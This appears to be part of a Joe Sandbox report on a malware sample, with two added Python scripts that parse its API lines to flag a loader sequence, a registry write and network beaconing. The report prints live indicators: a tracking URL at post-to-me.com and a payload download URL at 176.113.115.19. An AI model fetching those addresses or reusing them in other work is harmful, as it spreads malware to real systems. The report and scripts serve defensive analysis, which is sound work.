Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
• Instruction ID: 8b8381e38334751f3c5fee40e88eacdf1446f1079df49a385922c4ea532b4e29
• Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
• Instruction Fuzzy Hash: 4CC10670E04345AFDF11DFA9D841BAEBBB0BF0D305F14519AE805A7392C7789A41CB69

Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0210024D
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                  • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                                  • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                  • Instruction ID: aad6ab16f8a28cd0eb1489dbc57eebdc88624be26de041bf3cadf3bec6a1f088
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F4525974A01229DFDB64CF58C984BACBBB1BF09304F1580E9E54DAB391DB70AA95CF14

Control-flow Graph

APIs
• InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C1D
  • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
  • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
• InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E30
• InternetCloseHandle.WININET(00000000), ref: 00402E41
• InternetCloseHandle.WININET(00000000), ref: 00402E44
Strings
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: Internet$CloseHandleOpen_wcslen
• String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
• API String ID: 3067768807-1501832161
• Opcode ID: d6968632f8314940c7590e74f8d6b13d86a5e442bc38550d54e55658f4f001bc
• Instruction ID: 38c4ea95430cb0d064a2c81279cd8101482ed185274a1110c797b87c00f11b19
• Opcode Fuzzy Hash: d6968632f8314940c7590e74f8d6b13d86a5e442bc38550d54e55658f4f001bc
• Instruction Fuzzy Hash: 4C517095A65344A9E320EBB0BC46B3633B8FF58712F10543BE518CB2F2E7B49944875E
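
Added triage example (written for this page; it is not Joe Sandbox output and not part of the report). The two function summaries above carry enough structure to script a first-pass check: the 02100000 region (marked "based on PE: false") allocates with VirtualAlloc, then calls VirtualProtect, VirtualFree and LoadLibraryA, which is the shape of an in-memory loader, and the 00400000 function pairs InternetOpenW (whose first argument, lpszAgent, is the string ShareScreen) with InternetOpenUrlW next to the string https://post-to-me.com/track_prt.php?sub=. The script parses API lines in the report's bullet format, decodes the VirtualAlloc arguments (00001000 = MEM_COMMIT, 00000004 = PAGE_READWRITE) and applies three rules. The sample input is copied from the lines above; the image range (main module at 00400000, assumed to be under 1 MiB so that the 02100000 dump lies outside it), the rule names and the helper functions are assumptions of this example.

```python
"""Triage checks over Joe Sandbox function summaries (added example, not report output)."""
import re

# Constructed input: API bullet lines copied from the function summaries above.
API_LINES = """
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0210024D
• InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C1D
• InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E30
• InternetCloseHandle.WININET(00000000), ref: 00402E41
• InternetCloseHandle.WININET(00000000), ref: 00402E44
• CreateThread.KERNEL32(?,?,Function_0002DFB0,00000000,?,?), ref: 0042E14D
"""

# Call order read off the control-flow graph of the function at 0210003c.
CFG_CALLS_0210003C = ["VirtualAlloc", "VirtualProtect", "VirtualFree", "LoadLibraryA"]

# Strings from the Similarity block of the WinINet function.
FUNC_STRINGS = ["&cc=DE", "ShareScreen", "https://post-to-me.com/track_prt.php?sub="]

# Assumption (not from the report): the main module is mapped at 00400000 and is
# under 1 MiB, so the 02100000 dump marked "based on PE: false" lies outside the image.
IMAGE_RANGES = [(0x00400000, 0x00500000)]

API_RE = re.compile(
    r"^\W*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)

MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x80000: "MEM_RESET"}
PAGE_PROT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
EXEC_PROT = {0x10, 0x20, 0x40, 0x80}   # the PAGE_EXECUTE* protection values


def parse_api_lines(text):
    """One dict per API line: api name, module, argument list, caller address (ref)."""
    calls = []
    for line in text.splitlines():
        m = API_RE.match(line.strip())
        if m:
            calls.append({"api": m["api"], "module": m["module"],
                          "args": m["args"].split(",") if m["args"] else [],
                          "ref": int(m["ref"], 16)})
    return calls


def decode_virtualalloc(args):
    """Decode flAllocationType (3rd argument) and flProtect (4th); '?' means unresolved."""
    alloc = None if args[2] == "?" else int(args[2], 16)
    prot = None if args[3] == "?" else int(args[3], 16)
    names = [n for bit, n in MEM_FLAGS.items() if alloc is not None and alloc & bit]
    return {"allocation": names or ["unknown"],
            "protection": PAGE_PROT.get(prot, "unknown" if prot is None else hex(prot)),
            "executable": prot in EXEC_PROT}


def in_image(addr):
    return any(lo <= addr < hi for lo, hi in IMAGE_RANGES)


def is_loader_sequence(call_names):
    """Subsequence match: allocate, then change page protection, then resolve a DLL."""
    want = ["VirtualAlloc", "VirtualProtect", "LoadLibraryA"]
    pos = 0
    for name in call_names:
        if pos < len(want) and name == want[pos]:
            pos += 1
    return pos == len(want)


def find_beacons(calls, strings):
    """Pair InternetOpenW (first argument is lpszAgent) with the next InternetOpenUrlW."""
    urls = [s for s in strings if s.startswith(("http://", "https://"))]
    found, agent = [], None
    for c in calls:
        if c["api"] == "InternetOpenW":
            agent = c["args"][0]
        elif c["api"] == "InternetOpenUrlW" and agent is not None:
            found.append({"agent": agent, "urls": urls, "ref": c["ref"]})
            agent = None
    return found


def triage(api_text=API_LINES, cfg_calls=CFG_CALLS_0210003C, strings=FUNC_STRINGS):
    """Run the three rules and return human-readable findings."""
    calls = parse_api_lines(api_text)
    findings = []
    for c in calls:
        if c["api"] == "VirtualAlloc":
            d = decode_virtualalloc(c["args"])
            findings.append(f"VirtualAlloc at {c['ref']:08X}: "
                            f"{'|'.join(d['allocation'])}, {d['protection']}")
        if c["api"] in ("VirtualAlloc", "VirtualProtect", "LoadLibraryA") and not in_image(c["ref"]):
            findings.append(f"{c['api']} called from non-image memory at {c['ref']:08X}")
    if is_loader_sequence(cfg_calls):
        findings.append("in-memory loader sequence: VirtualAlloc -> VirtualProtect -> LoadLibraryA")
    for b in find_beacons(calls, strings):
        findings.append(f"WinINet beacon at {b['ref']:08X}, agent {b['agent']!r}, urls {b['urls']}")
    return findings


if __name__ == "__main__":
    for finding in triage():
        print(finding)
```

Run stand-alone it reports four findings: the decoded VirtualAlloc (MEM_COMMIT, PAGE_READWRITE), the same call flagged because its ref 0210024D is outside the assumed image range (consistent with the dump being marked "based on PE: false"), the loader sequence from the graph, and the beacon with agent ShareScreen and the post-to-me.com URL. The sequence rule is a subsequence match, so the VirtualFree between VirtualProtect and LoadLibraryA does not break it; allocating PAGE_READWRITE first and flipping permissions with VirtualProtect afterwards is the usual order when a stub writes its payload before making it executable.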

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
• String ID:
• API String ID: 1687354797-0
• Opcode ID: 7c13552ddbe0b7b52b6219a3b6943351ceb5bdfd2161b5b6eba885959c9bb842
• Instruction ID: ef80ad8abc8d01ee6ed88eea47d540721f1d2954bb97cc6dce8e21ba99fc2e21
• Opcode Fuzzy Hash: 7c13552ddbe0b7b52b6219a3b6943351ceb5bdfd2161b5b6eba885959c9bb842
• Instruction Fuzzy Hash: EB215172C042489ADF15EBF5D8417DEB7F8AF08318F54407FE400B62C1DB7D89448A69

Control-flow Graph

APIs
• std::_Cnd_initX.LIBCPMT ref: 00405812
• __Cnd_signal.LIBCPMT ref: 0040581E
• std::_Cnd_initX.LIBCPMT ref: 00405833
• __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 0040583A
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
• String ID:
• API String ID: 2059591211-0
• Opcode ID: 7b268af305ad7e70588f0d2166d3aa4120e27ad18746cc38b88b58263b6b4356
• Instruction ID: aebd2ac95218272d728fe4b8aabd0d06745c53d3a4d3bf2acc4ab23466c53149
• Opcode Fuzzy Hash: 7b268af305ad7e70588f0d2166d3aa4120e27ad18746cc38b88b58263b6b4356
• Instruction Fuzzy Hash: 5FF082324007009BE7313772C80770A77A0AF04319F54883EF456769E2DBBEA8585A5D

Control-flow Graph

Control-flow graph of the function at 402956 (rendered graph not recoverable; blocks 402956-4029e9): calls the internal subroutines 426820, 42a33b, 42b444 and 402819 (block 402956), then 404329 and 40f8c5 (block 4029cf).
APIs
• _wcslen.LIBCMT ref: 00402985
• __fassign.LIBCMT ref: 00402995
  • Part of subcall function 00402819: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004028FC
Strings
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
• String ID: +@
• API String ID: 2843524283-4068139069
• Opcode ID: c4372d71d1af2a683dbfcdd1665cb533e7f75167211033e386056ce4ddc1eda8
• Instruction ID: 360ce0a8eae9c999d09f2756f3db8bce049cda3fb2da0c45bd643548fbd10a56
• Opcode Fuzzy Hash: c4372d71d1af2a683dbfcdd1665cb533e7f75167211033e386056ce4ddc1eda8
• Instruction Fuzzy Hash: F901D6B1E0011C5ADB24EA25ED46AEF77689B41308F1401BBA605E31C1D9785E45CA99

Control-flow Graph

APIs
• GetLastError.KERNEL32(00457910,00000010,00000003,00431F4D), ref: 0042DFC3
• ExitThread.KERNEL32 ref: 0042DFCA
Strings
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: ErrorExitLastThread
• String ID: <(@
• API String ID: 1611280651-4189137628
• Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
• Instruction ID: e0787552ab8efb8db6d324a59155cd7370fffab00d3424d568e81b2c5b813918
• Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
• Instruction Fuzzy Hash: 7EF0A471A00614AFDB04EFB1D80AA6D3B70FF09715F10056AF40257292CB7969558B68

Control-flow Graph

                                                                                                                                                                                                                                                  control_flow_graph 452 42e104-42e10f 453 42e111-42e123 call 42eab9 call 42a58d 452->453 454 42e125-42e138 call 42e0bb 452->454 466 42e175-42e178 453->466 460 42e166 454->460 461 42e13a-42e157 CreateThread 454->461 465 42e168-42e174 call 42e02d 460->465 463 42e179-42e17e 461->463 464 42e159-42e165 GetLastError call 42ea83 461->464 469 42e180-42e183 463->469 470 42e185-42e187 463->470 464->460 465->466 469->470 470->465
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateThread.KERNEL32(?,?,Function_0002DFB0,00000000,?,?), ref: 0042E14D
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,0040CF04,00000000,00000000,?,?,00000000,?), ref: 0042E159
                                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 0042E160
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2744730728-0
                                                                                                                                                                                                                                                  • Opcode ID: 7111d36ae7d9c15de437581cc3a8b466686a4c726987840fc25d61e653133f3e
                                                                                                                                                                                                                                                  • Instruction ID: 0446f91cba5bc1877a5460ce95bae766c471c3d01d015a917539d7ef00797947
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7111d36ae7d9c15de437581cc3a8b466686a4c726987840fc25d61e653133f3e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF01D236600139BBDB119FA3FC05AAF7B6AEF85720F40003AF80582210DB358D21C7A9

Control-flow Graph (basic blocks, calls and edges): 473 434745-43475d call 439911 476 434770-434786 SetFilePointerEx 473->476 477 43475f-434764 call 42eab9 473->477 478 434797-4347a1 476->478 479 434788-434795 GetLastError call 42ea83 476->479 483 43476a-43476e 477->483 482 4347a3-4347b8 478->482 478->483 479->483 485 4347bd-4347c2 482->485 483->485
APIs
• SetFilePointerEx.KERNEL32(00000000,00000000,0040DDCB,00000000,00000002,0040DDCB,00000000,?,?,?,004347F4,00000000,00000000,0040DDCB,00000002), ref: 0043477E
• GetLastError.KERNEL32(?,004347F4,00000000,00000000,0040DDCB,00000002,?,0042C151,?,00000000,00000000,00000001,?,0040DDCB,?,0042C206), ref: 00434788
• __dosmaperr.LIBCMT ref: 0043478F
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: ErrorFileLastPointer__dosmaperr
• String ID:
• API String ID: 2336955059-0
• Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
• Instruction ID: 754c6ade6be4612c7e0c4d55d151f31ddb378772f23eed9c1438f533fa7de6e2
• Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
• Instruction Fuzzy Hash: 92012836710114ABDB159FAADC058EE7B2AEFCA721F24020AF81597290EB74ED528794

Control-flow Graph (basic blocks, calls and edges): 487 402ba3-402bcf RegCreateKeyExW 488 402bd1-402be3 RegSetValueExW 487->488 489 402be5-402be8 487->489 488->489 490 402bf3-402bf9 489->490 491 402bea-402bed RegCloseKey 489->491 491->490
APIs
• RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BC5
• RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BDD
• RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BED
Note: in the RegCreateKeyExW call, hKey 80000001 is HKEY_CURRENT_USER and samDesired 000F003F is KEY_ALL_ACCESS; in RegSetValueExW, dwType 00000001 is REG_SZ and cbData is 00000004. The sub-key, value name and data are unresolved (?), so the report does not name the key this routine writes; arguments past a function's real parameter count are stack residue and should be ignored.
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: CloseCreateValue
• String ID:
• API String ID: 1818849710-0
• Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
• Instruction ID: 504cdbf1e8d79b6d7283afc99896261950e1a919ac783b79018d19fe3f3d7e53
• Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
• Instruction Fuzzy Hash: 16F0B4B650011CFFEB214F94DD89DABBA7CEB047E9F100175FA01B2150D6B19E009664
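The RegCreateKeyExW / RegSetValueExW / RegCloseKey triple above is the pattern an analyst triages as a candidate persistence or configuration write, and the Sleep() routine further down in this listing carries a plaintext download URL. The following Python is an added example, not part of the Joe Sandbox report or of the sample: it parses API-call and String ID lines in the report's own text format, decodes the Win32 constants by their prototype position (hKey, samDesired, dwType, cbData), flags a create-then-set sequence on the same key before it is closed, and defangs any URL found in a String ID. Its input is copied from this report (the three registry lines, the Sleep line and the URL string); because the sub-key and value name are printed as "?", the example can only flag the pattern, not name the key. The function names (parse_line, find_registry_writes, triage, defang) are the example's own.

```python
import re
from urllib.parse import urlparse

# Input copied from this report's API listing (the registry routine at
# 0x402ba3 and the String ID of the Sleep() routine); not constructed.
REPORT_LINES = [
    "• RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BC5",
    "• RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BDD",
    "• RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BED",
    "• Sleep.KERNEL32(00001562), ref: 00401562",
    "• String ID: http://176.113.115.19/ScreenUpdateSync.exe",
]

# One API call line in the report: "• Name.MODULE(arg,arg,...), ref: ADDR"
API_RE = re.compile(r"^\s*•\s*(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
STR_RE = re.compile(r"^\s*•\s*String ID:\s*(?P<s>\S.*)$")
URL_RE = re.compile(r"https?://[^\s,]+")

# Win32 constants (winreg.h / winnt.h)
HKEY_ROOTS = {
    0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS",
}
KEY_ALL_ACCESS = 0x000F003F
REG_TYPES = {0: "REG_NONE", 1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY",
             4: "REG_DWORD", 7: "REG_MULTI_SZ"}


def parse_line(line):
    """Return a dict for an API-call or String ID line, else None."""
    m = API_RE.match(line)
    if m:
        raw = m.group("args").strip()
        args = [a.strip() for a in raw.split(",")] if raw else []
        return {"kind": "api", "api": m.group("api"), "module": m.group("mod"),
                "args": args, "ref": int(m.group("ref"), 16)}
    m = STR_RE.match(line)
    if m:
        return {"kind": "string", "value": m.group("s").strip()}
    return None


def arg_int(args, idx):
    """Argument idx as int, or None when the sandbox printed '?' (unresolved)
    or a symbol. The report prints stack residue past the real parameter
    count, so callers only read positions defined by the Win32 prototype."""
    if idx >= len(args) or args[idx] == "?":
        return None
    try:
        return int(args[idx], 16)
    except ValueError:  # e.g. "Function_0002DFB0"
        return None


def find_registry_writes(events):
    """Flag RegCreateKeyExW followed by RegSetValueExW before the matching
    RegCloseKey: a candidate persistence / configuration write."""
    findings = []
    for i, ev in enumerate(events):
        if ev.get("api") != "RegCreateKeyExW":
            continue
        root = arg_int(ev["args"], 0)     # hKey
        access = arg_int(ev["args"], 5)   # samDesired
        for nxt in events[i + 1:]:
            if nxt.get("api") == "RegCloseKey":
                break
            if nxt.get("api") == "RegSetValueExW":
                rtype = arg_int(nxt["args"], 3)   # dwType
                findings.append({
                    "root": HKEY_ROOTS.get(root, "unresolved" if root is None else hex(root)),
                    "access": "KEY_ALL_ACCESS" if access == KEY_ALL_ACCESS
                              else ("unresolved" if access is None else hex(access)),
                    "type": REG_TYPES.get(rtype, "unresolved" if rtype is None else hex(rtype)),
                    "data_len": arg_int(nxt["args"], 5),   # cbData
                    "create_ref": ev["ref"], "set_ref": nxt["ref"],
                })
                break
    return findings


def defang(url):
    """hxxp:// and [.] before the last host label so the IOC is not clickable."""
    host = urlparse(url).netloc
    i = host.rfind(".")
    safe_host = host[:i] + "[.]" + host[i + 1:] if i > 0 else host
    return "hxxp" + url.replace(host, safe_host, 1)[4:]


def extract_urls(events):
    urls = []
    for ev in events:
        if ev["kind"] == "string":
            urls.extend(defang(u) for u in URL_RE.findall(ev["value"]))
    return urls


def triage(lines):
    events = [e for e in (parse_line(l) for l in lines) if e]
    return {"registry_writes": find_registry_writes(events), "urls": extract_urls(events)}


if __name__ == "__main__":
    for key, value in triage(REPORT_LINES).items():
        print(key, value)
```

Running it over the copied lines yields one registry write (HKEY_CURRENT_USER, KEY_ALL_ACCESS, REG_SZ, 4 bytes, create at 0x402BC5 and set at 0x402BDD) and the defanged URL hxxp://176.113.115[.]19/ScreenUpdateSync.exe. Lines that are not API calls or String IDs (sub-call notes, hashes) are ignored, and arguments the sandbox could not resolve come back as "unresolved" rather than being guessed.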

Control-flow Graph (basic blocks, calls and edges): 492 42e064-42e071 call 431f4e 495 42e073-42e076 ExitThread 492->495 496 42e07c-42e084 492->496 496->495 497 42e086-42e08a 496->497 498 42e091-42e097 497->498 499 42e08c call 4354e6 497->499 501 42e0a4-42e0aa 498->501 502 42e099-42e09b 498->502 499->498 501->495 504 42e0ac-42e0ae 501->504 502->501 503 42e09d-42e09e CloseHandle 502->503 503->501 504->495 505 42e0b0-42e0ba FreeLibraryAndExitThread 504->505
APIs
  • Part of subcall function 00431F4E: GetLastError.KERNEL32(?,?,?,0042EABE,00434D6C,?,00431EF8,00000001,00000364,?,0042DFD5,00457910,00000010), ref: 00431F53
  • Part of subcall function 00431F4E: _free.LIBCMT ref: 00431F88
  • Part of subcall function 00431F4E: SetLastError.KERNEL32(00000000), ref: 00431FBC
• ExitThread.KERNEL32 ref: 0042E076
• CloseHandle.KERNEL32(?,?,?,0042E196,?,?,0042E00D,00000000), ref: 0042E09E
• FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E196,?,?,0042E00D,00000000), ref: 0042E0B4
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
• String ID:
• API String ID: 1198197534-0
• Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
• Instruction ID: fd9bad38e730a393213bf68ec19d44fd98ecce05ba50bc9e79acb20fd3a4735a
• Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
• Instruction Fuzzy Hash: 8CF05E342006347BEB319F37EC08A5B7A98AF05725F584756B924C22A1DBBCDD82869C

Control-flow Graph (basic blocks, calls and edges): 506 402394-4023a2 507 402557-402559 PostQuitMessage 506->507 508 4023a8-4023ad 506->508 509 40255f-402564 507->509 510 4023c6-4023cd 508->510 511 4023af-4023c1 DefWindowProcW 508->511 512 4023d4-4023db 510->512 513 4023cf call 401d9a 510->513 511->509 512->509 514 4023e1-402555 call 4010ba call 4029ea 512->514 513->512 514->509
APIs
• DefWindowProcW.USER32(?,?,?,?), ref: 004023BB
• PostQuitMessage.USER32(00000000), ref: 00402559
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: MessagePostProcQuitWindow
• String ID:
• API String ID: 3873111417-0
• Opcode ID: d57fbe59a329fb309be7fe1269fcb85092641ffb4e542ab0082b7c0a7099a69f
• Instruction ID: bf68dd1ed3332b821989bb5fb7b10a9ee1776f212d734df2d08f0bb157d40bf1
• Opcode Fuzzy Hash: d57fbe59a329fb309be7fe1269fcb85092641ffb4e542ab0082b7c0a7099a69f
• Instruction Fuzzy Hash: 1A412D11A64380A5E630FFA5BC55B2533B0FF54712F10653BE524DB2B6E3B28544C75E
APIs
• Sleep.KERNEL32(00001562), ref: 00401562
  • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
  • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
Strings
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: _wcslen$Sleep
• String ID: http://176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                                                  • API String ID: 3358372957-3120454669
                                                                                                                                                                                                                                                  • Opcode ID: 7701b78b2553ec30eafcf5b5a8124595c597b4782acb6499a108b1673ff50c75
                                                                                                                                                                                                                                                  • Instruction ID: 7c00d7bba67f06605ca45885bb35db497ce8a02c3eee20c143d632ed8421155e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7701b78b2553ec30eafcf5b5a8124595c597b4782acb6499a108b1673ff50c75
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 49317955A6538094E330DFA0BC56B252370FF64B52F50653BD60CCB2B2E7A18587C75E
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000400,?,?,02100223,?,?), ref: 02100E19
                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,02100223,?,?), ref: 02100E1E
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                                                                                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                  • Instruction ID: d5591706dddec6dc70c020a45b27ca906bb1356f428d6b1f08c8c78c4e708908
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05D0123114512877D7002A94DC09BCD7B1CDF09B66F108011FB0DE9080C7B0954046E5
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                                                                                                                                                                                  • Instruction ID: bbb5b7410918ed3a19f08aeefc1504024edbbdc2131895f71ed4605d11f41fec
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB51E971A00214AFDB10DF59C844BEA7BA1EFC9364F19929AF8099B391C735FD42CB94
                                                                                                                                                                                                                                                  APIs
